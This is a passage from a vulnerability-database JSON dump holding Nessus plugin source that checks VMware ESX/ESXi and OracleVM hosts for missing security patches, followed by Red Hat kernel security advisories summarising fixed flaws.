audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2010-05-27\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.5.0\", patch:\"ESX350-201006405-SG\")) flag++;\nif (esx_check(ver:\"ESX 3.5.0\", patch:\"ESX350-201006406-SG\")) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-201006408-SG\",\n patch_updates : make_list(\"ESX350-201008411-SG\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005401-SG\",\n patch_updates : make_list(\"ESX400-201009401-SG\", \"ESX400-201101401-SG\", \"ESX400-201103401-SG\", \"ESX400-201104401-SG\", \"ESX400-201110401-SG\", \"ESX400-201111201-SG\", \"ESX400-201203401-SG\", \"ESX400-201205401-SG\", \"ESX400-201206401-SG\", \"ESX400-201209401-SG\", \"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005405-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005406-SG\",\n patch_updates : make_list(\"ESX400-201009403-SG\", \"ESX400-201110403-SG\", \"ESX400-201203407-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005407-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005408-SG\",\n patch_updates : make_list(\"ESX400-201103407-SG\", \"ESX400-201305403-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005409-SG\",\n patch_updates : make_list(\"ESX400-201009410-SG\", \"ESX400-201101404-SG\", \"ESX400-201305402-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.0.0\",\n patch : \"ESXi400-201005401-SG\",\n patch_updates : make_list(\"ESXi400-201101401-SG\", \"ESXi400-201103401-SG\", \"ESXi400-201104401-SG\", \"ESXi400-201110401-SG\", \"ESXi400-201203401-SG\", \"ESXi400-201205401-SG\", \"ESXi400-201206401-SG\", \"ESXi400-201209401-SG\", \"ESXi400-201302401-SG\", \"ESXi400-201305401-SG\", \"ESXi400-201310401-SG\", \"ESXi400-201404401-SG\", \"ESXi400-Update02\", \"ESXi400-Update03\", \"ESXi400-Update04\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:10:58", "references": ["https://www.vmware.com/security/advisories/VMSA-2010-0009", "http://lists.vmware.com/pipermail/security-announce/2010/000099.html"], "pluginID": "89740", "description": "The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including remote code execution vulnerabilities, in several components and third-party libraries :\n\n - libpng\n - VMnc Codec\n - vmrun\n - VMware Remote Console (VMrc)\n - VMware Tools\n - vmware-authd", "edition": 6, "reporter": "Tenable", "published": "2016-03-08T00:00:00", "title": "VMware ESX / ESXi Third-Party Libraries and Components (VMSA-2010-0009) (remote check)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "VMware ESX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3613", "CVE-2009-3556", "CVE-2009-1386", "CVE-2009-4537", "CVE-2009-1379", "CVE-2009-3939", "CVE-2009-1377", "CVE-2009-4272", "CVE-2009-3621", "CVE-2009-3726", "CVE-2009-2910", "CVE-2009-4355", "CVE-2009-4141", "CVE-2009-2409", "CVE-2009-3563", "CVE-2009-1387", "CVE-2010-0001", "CVE-2007-4567", "CVE-2010-0382", "CVE-2009-1378", "CVE-2010-0290", "CVE-2009-0590", "CVE-2009-3080", "CVE-2009-4538", "CVE-2009-3547", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3620", "CVE-2010-0426", "CVE-2009-4536", "CVE-2010-0427", "CVE-2009-2908", "CVE-2009-1384", "CVE-2009-3228", "CVE-2009-3889", "CVE-2010-0097", "CVE-2009-4212", "CVE-2009-4021", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-3736", "CVE-2009-4138", "CVE-2009-2695"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/o:vmware:esx", "cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2010-0009_REMOTE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=89740", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89740);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2006-6304\",\n \"CVE-2007-4567\",\n \"CVE-2009-0590\",\n \"CVE-2009-1377\",\n \"CVE-2009-1378\",\n \"CVE-2009-1379\",\n \"CVE-2009-1384\",\n \"CVE-2009-1386\",\n \"CVE-2009-1387\",\n \"CVE-2009-2409\",\n \"CVE-2009-2695\",\n \"CVE-2009-2908\",\n \"CVE-2009-2910\",\n \"CVE-2009-3080\",\n \"CVE-2009-3228\",\n \"CVE-2009-3286\",\n \"CVE-2009-3547\",\n \"CVE-2009-3556\",\n \"CVE-2009-3563\",\n \"CVE-2009-3612\",\n \"CVE-2009-3613\",\n \"CVE-2009-3620\",\n \"CVE-2009-3621\",\n \"CVE-2009-3726\",\n \"CVE-2009-3736\",\n \"CVE-2009-3889\",\n \"CVE-2009-3939\",\n \"CVE-2009-4020\",\n \"CVE-2009-4021\",\n \"CVE-2009-4138\",\n \"CVE-2009-4141\",\n \"CVE-2009-4212\",\n \"CVE-2009-4272\",\n \"CVE-2009-4355\",\n \"CVE-2009-4536\",\n \"CVE-2009-4537\",\n \"CVE-2009-4538\",\n \"CVE-2010-0001\",\n \"CVE-2010-0097\",\n \"CVE-2010-0290\",\n \"CVE-2010-0382\",\n \"CVE-2010-0426\",\n \"CVE-2010-0427\"\n );\n script_bugtraq_id(\n 31692,\n 34256,\n 35001,\n 35112,\n 35138,\n 35174,\n 35417,\n 36304,\n 36472,\n 36576,\n 36639,\n 36706,\n 36723,\n 36824,\n 36827,\n 36901,\n 36936,\n 37019,\n 37068,\n 37069,\n 37118,\n 37128,\n 37255,\n 37339,\n 37519,\n 37521,\n 37523,\n 37749,\n 37806,\n 37865,\n 37876,\n 37886,\n 38432\n );\n script_xref(name:\"VMSA\", value:\"2010-0009\");\n\n script_name(english:\"VMware ESX / ESXi Third-Party Libraries and Components (VMSA-2010-0009) (remote check)\");\n script_summary(english:\"Checks the ESX / ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including\nremote code execution vulnerabilities, in several components and\nthird-party libraries :\n\n - libpng\n - VMnc Codec\n - vmrun\n - VMware Remote Console (VMrc)\n - VMware Tools\n - vmware-authd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2010-0009\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2010/000099.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 3.5 / 4.0 or ESXi version 3.5 / 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/08\");\n \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\nesx = '';\n\nif (\"ESX\" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX/ESXi\");\n\nextract = eregmatch(pattern:\"^(ESXi?) (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX/ESXi\");\nelse\n{\n esx = extract[1];\n ver = extract[2];\n}\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"256968\",\n \"3.5\", \"259926\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESXi?.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware \" + esx, ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif (!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n\nif (build < fix)\n{\n\n report = '\\n Version : ' + esx + \" \" + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:41:35", "references": ["https://oss.oracle.com/pipermail/oraclevm-errata/2013-May/000153.html"], "pluginID": "79507", "description": "The remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2013-0039 for details.", "edition": 14, "reporter": "Tenable", "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : kernel (OVMSA-2013-0039)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4242", "CVE-2010-2942", "CVE-2011-0521", "CVE-2010-3078", "CVE-2009-4537", "CVE-2010-4081", "CVE-2010-1641", "CVE-2010-2248", "CVE-2009-1895", "CVE-2010-4073", "CVE-2009-2692", "CVE-2010-2226", "CVE-2010-4346", "CVE-2010-0007", "CVE-2011-1746", "CVE-2011-4348", "CVE-2009-3621", "CVE-2011-4324", "CVE-2011-1160", "CVE-2011-4110", "CVE-2010-2521", "CVE-2010-4083", "CVE-2011-1078", "CVE-2011-1083", "CVE-2011-1162", "CVE-2009-4067", "CVE-2011-2491", "CVE-2010-4649", "CVE-2010-1437", "CVE-2009-3726", "CVE-2010-3859", "CVE-2011-1776", "CVE-2011-4127", "CVE-2010-3477", "CVE-2010-3086", "CVE-2009-0747", "CVE-2012-2136", "CVE-2011-1573", "CVE-2010-0727", "CVE-2009-4141", "CVE-2010-4080", "CVE-2009-0746", "CVE-2010-2963", "CVE-2010-3877", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3296", "CVE-2007-4567", "CVE-2011-2484", "CVE-2012-1583", "CVE-2010-0415", "CVE-2010-1084", "CVE-2011-2022", "CVE-2010-4258", "CVE-2011-1079", "CVE-2011-1044", "CVE-2010-3442", "CVE-2009-3080", "CVE-2010-4248", "CVE-2009-4538", "CVE-2009-3547", "CVE-2006-6304", "CVE-2011-1163", "CVE-2010-2240", "CVE-2009-4020", "CVE-2011-1833", "CVE-2010-1083", "CVE-2011-4330", "CVE-2010-4249", "CVE-2009-0745", "CVE-2011-4086", "CVE-2010-4157", "CVE-2009-3620", "CVE-2011-2203", "CVE-2009-2407", "CVE-2011-1093", "CVE-2011-1010", "CVE-2011-1020", "CVE-2010-3858", "CVE-2010-0622", "CVE-2010-3067", "CVE-2011-2482", "CVE-2009-4536", "CVE-2009-1388", "CVE-2010-1086", "CVE-2010-1188", "CVE-2009-1389", "CVE-2011-4077", "CVE-2011-2213", "CVE-2010-1436", "CVE-2010-2798", "CVE-2009-0748", "CVE-2009-2406", "CVE-2010-1173", "CVE-2010-0437", "CVE-2009-2908", "CVE-2009-4308", "CVE-2011-3638", "CVE-2009-2848", "CVE-2009-4307", "CVE-2010-1088", "CVE-2011-3637", "CVE-2010-3432", "CVE-2009-4021", "CVE-2011-0726", "CVE-2010-1087", "CVE-2011-1745", "CVE-2009-3286", "CVE-2011-1182", "CVE-2011-1090", "CVE-2009-3612", "CVE-2009-4138", "CVE-2011-2525", "CVE-2011-3191", "CVE-2011-1080", "CVE-2009-2847", "CVE-2010-4655", "CVE-2011-1585", "CVE-2011-1577", "CVE-2011-2496"], "modified": "2018-07-24T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel", "p-cpe:/a:oracle:vm:kernel-PAE-devel", "p-cpe:/a:oracle:vm:kernel-devel", "cpe:/o:oracle:vm_server:2.2", "p-cpe:/a:oracle:vm:kernel-ovs", "p-cpe:/a:oracle:vm:kernel-ovs-devel", "p-cpe:/a:oracle:vm:kernel-PAE"], "id": "ORACLEVM_OVMSA-2013-0039.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79507", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2013-0039.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79507);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2007-4567\", \"CVE-2009-0745\", \"CVE-2009-0746\", \"CVE-2009-0747\", \"CVE-2009-0748\", \"CVE-2009-1388\", \"CVE-2009-1389\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-2692\", \"CVE-2009-2847\", \"CVE-2009-2848\", \"CVE-2009-2908\", \"CVE-2009-3080\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3612\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3726\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4067\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4307\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0007\", \"CVE-2010-0415\", \"CVE-2010-0437\", \"CVE-2010-0622\", \"CVE-2010-0727\", \"CVE-2010-1083\", \"CVE-2010-1084\", \"CVE-2010-1086\", \"CVE-2010-1087\", \"CVE-2010-1088\", \"CVE-2010-1173\", \"CVE-2010-1188\", \"CVE-2010-1436\", \"CVE-2010-1437\", \"CVE-2010-1641\", \"CVE-2010-2226\", \"CVE-2010-2240\", \"CVE-2010-2248\", \"CVE-2010-2521\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2963\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3086\", \"CVE-2010-3296\", \"CVE-2010-3432\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3858\", \"CVE-2010-3859\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-4073\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4242\", \"CVE-2010-4248\", \"CVE-2010-4249\", \"CVE-2010-4258\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2010-4655\", \"CVE-2011-0521\", \"CVE-2011-0726\", \"CVE-2011-1010\", \"CVE-2011-1020\", \"CVE-2011-1044\", \"CVE-2011-1078\", \"CVE-2011-1079\", \"CVE-2011-1080\", \"CVE-2011-1083\", \"CVE-2011-1090\", \"CVE-2011-1093\", \"CVE-2011-1160\", \"CVE-2011-1162\", \"CVE-2011-1163\", \"CVE-2011-1182\", \"CVE-2011-1573\", \"CVE-2011-1577\", \"CVE-2011-1585\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2011-1776\", \"CVE-2011-1833\", \"CVE-2011-2022\", \"CVE-2011-2203\", \"CVE-2011-2213\", \"CVE-2011-2482\", \"CVE-2011-2484\", \"CVE-2011-2491\", \"CVE-2011-2496\", \"CVE-2011-2525\", \"CVE-2011-3191\", \"CVE-2011-3637\", \"CVE-2011-3638\", \"CVE-2011-4077\", \"CVE-2011-4086\", \"CVE-2011-4110\", \"CVE-2011-4127\", \"CVE-2011-4324\", \"CVE-2011-4330\", \"CVE-2011-4348\", \"CVE-2012-1583\", \"CVE-2012-2136\");\n script_bugtraq_id(35281, 35647, 35850, 35851, 35930, 36038, 36472, 36639, 36723, 36824, 36827, 36901, 36936, 37068, 37069, 37339, 37519, 37521, 37523, 37762, 37806, 38144, 38165, 38185, 38479, 38898, 39016, 39042, 39044, 39101, 39569, 39715, 39719, 39794, 40356, 40920, 42124, 42242, 42249, 42505, 42529, 43022, 43221, 43353, 43480, 43787, 43809, 44242, 44301, 44354, 44630, 44648, 44754, 44758, 45014, 45028, 45037, 45058, 45063, 45073, 45159, 45323, 45972, 45986, 46073, 46488, 46492, 46567, 46616, 46630, 46766, 46793, 46866, 46878, 47003, 47308, 47321, 47343, 47381, 47534, 47535, 47791, 47796, 47843, 48236, 48333, 48383, 48641, 48687, 49108, 49141, 49295, 49373, 50322, 50370, 50750, 50755, 50764, 50798, 51176, 51361, 51363, 51945, 53139, 53721);\n\n script_name(english:\"OracleVM 2.2 : kernel (OVMSA-2013-0039)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2013-0039 for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2013-May/000153.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel Sendpage Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 119, 189, 200, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-PAE-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-PAE-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-ovs-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-ovs-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-devel / kernel-ovs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:43:07", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-128.14.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-128.14.1.el5.noarch.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a deficiency was found in the fasync_helper() implementation. This could\nallow a local, unprivileged user to leverage a use-after-free of locked,\nasynchronous file descriptors to cause a denial of service or privilege\nescalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb() function\nin the Linux kernel Stream Control Transmission Protocol (SCTP)\nimplementation. A remote attacker could send a specially-crafted SCTP\npacket to a target system, resulting in a denial of service.\n(CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail()\nfunction in the Linux kernel. An attacker on the local network could\ntrigger this flaw by sending IPv6 traffic to a target system, leading to a\nsystem crash (kernel OOPS) if dst->neighbour is NULL on the target system\nwhen receiving an IPv6 packet. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs:\n\n* programs compiled on x86, and that also call sched_rr_get_interval(),\nwere silently corrupted when run on 64-bit systems. With this update, when\nsuch programs attempt to call sched_rr_get_interval() on 64-bit systems,\nsys32_sched_rr_get_interval() is called instead, which resolves this issue.\n(BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a\nregression, preventing Wake on LAN (WoL) working for network devices using\nthe Intel PRO/1000 Linux driver, e1000e. Attempting to configure WoL for\nsuch devices resulted in the following error, even when configuring valid\noptions:\n\n\"Cannot set new wake-on-lan settings: Operation not supported\nnot setting wol\"\n\nThis update resolves this regression, and WoL now works as expected for\nnetwork devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel 64\nand AMD64 systems, one of which could have possibly led to data corruption.\n(BZ#568307)\n\n* on some systems, a race condition in the inode-based file event\nnotifications implementation caused soft lockups and the following\nmessages:\n\n\"BUG: warning at fs/inotify.c:181/set_dentry_child_flags()\"\n\"BUG: soft lockup - CPU#[x] stuck for 10s!\"\n\nThis update resolves this race condition, and also removes the inotify\ndebugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "reporter": "RedHat", "published": "2010-03-16T04:00:00", "type": "redhat", "title": "(RHSA-2010:0149) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4141", "CVE-2009-4538", "CVE-2010-0008", "CVE-2010-0437"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-07-28T18:59:54", "id": "RHSA-2010:0149", "href": "https://access.redhat.com/errata/RHSA-2010:0149", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:07", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-164.11.1.el5.i686.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* an array index error was found in the gdth driver. A local user could\nsend a specially-crafted IOCTL request that would cause a denial of service\nor, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer, possibly\nleading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to leverage a\nuse-after-free of locked, asynchronous file descriptors to cause a denial\nof service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an attacker\nwas able to cause a large enough number of collisions in the routing hash\ntable (via specially-crafted packets) for the emergency route flush to\ntrigger, a deadlock could occur. Secondly, if the kernel routing cache was\ndisabled, an uninitialized pointer would be left behind after a route\nlookup, leading to a kernel panic. (CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing, could\nuse this flaw to append data to the dumped core file. This issue only\naffects systems that have \"/proc/sys/fs/suid_dumpable\" set to 2 (the\ndefault value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\nset to 2, the core file will not be recorded if the file already exists.\nFor example, core files will not be overwritten on subsequent crashes of\nprocesses whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the 